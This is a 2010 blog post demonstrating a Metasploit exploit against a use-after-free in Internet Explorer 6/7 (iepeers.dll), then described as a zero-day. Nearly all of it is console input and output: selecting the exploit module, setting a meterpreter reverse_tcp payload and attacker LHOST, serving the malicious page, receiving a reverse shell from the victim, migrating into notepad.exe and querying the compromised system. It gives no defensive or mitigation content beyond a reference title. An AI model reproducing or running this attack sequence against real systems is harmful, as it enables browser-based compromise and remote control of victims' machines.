Wednesday, March 10, 2010

Metasploit Demo: Microsoft Internet Explorer iepeers.dll Use After Free

Here's a quick Metasploit demo of the latest Internet Explorer 6/7 0day:

msf > use windows/browser/ie_iepeers_pointer
msf exploit(ie_iepeers_pointer) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ie_iepeers_pointer) > set LHOST 10.0.0.1
LHOST => 10.0.0.1
msf exploit(ie_iepeers_pointer) > exploit
[*] Exploit running as background job.
msf exploit(ie_iepeers_pointer) >
[*] Started reverse handler on 10.0.0.1:4444
[*] Using URL: http://0.0.0.0:8080/JOk5k9hl
[*] Local IP: http://192.168.1.102:8080/JOk5k9hl
[*] Server started.
[*] Sending Microsoft Internet Explorer iepeers.dll Use After Free to 10.0.0.2:1038...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.2:1039)
[*] Session ID 1 (10.0.0.1:4444 -> 10.0.0.2:1039) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1892)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 1148
[*] New server process: notepad.exe (1148)

msf exploit(ie_iepeers_pointer) > sessions

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter LAB\Administrator @ LAB (1892) 10.0.0.1:4444 -> 10.0.0.2:1039

msf exploit(ie_iepeers_pointer) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: LAB
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US

References:

Microsoft Internet Explorer 'iepeers.dll' Remote Code Execution Vulnerability

No comments:

Post a Comment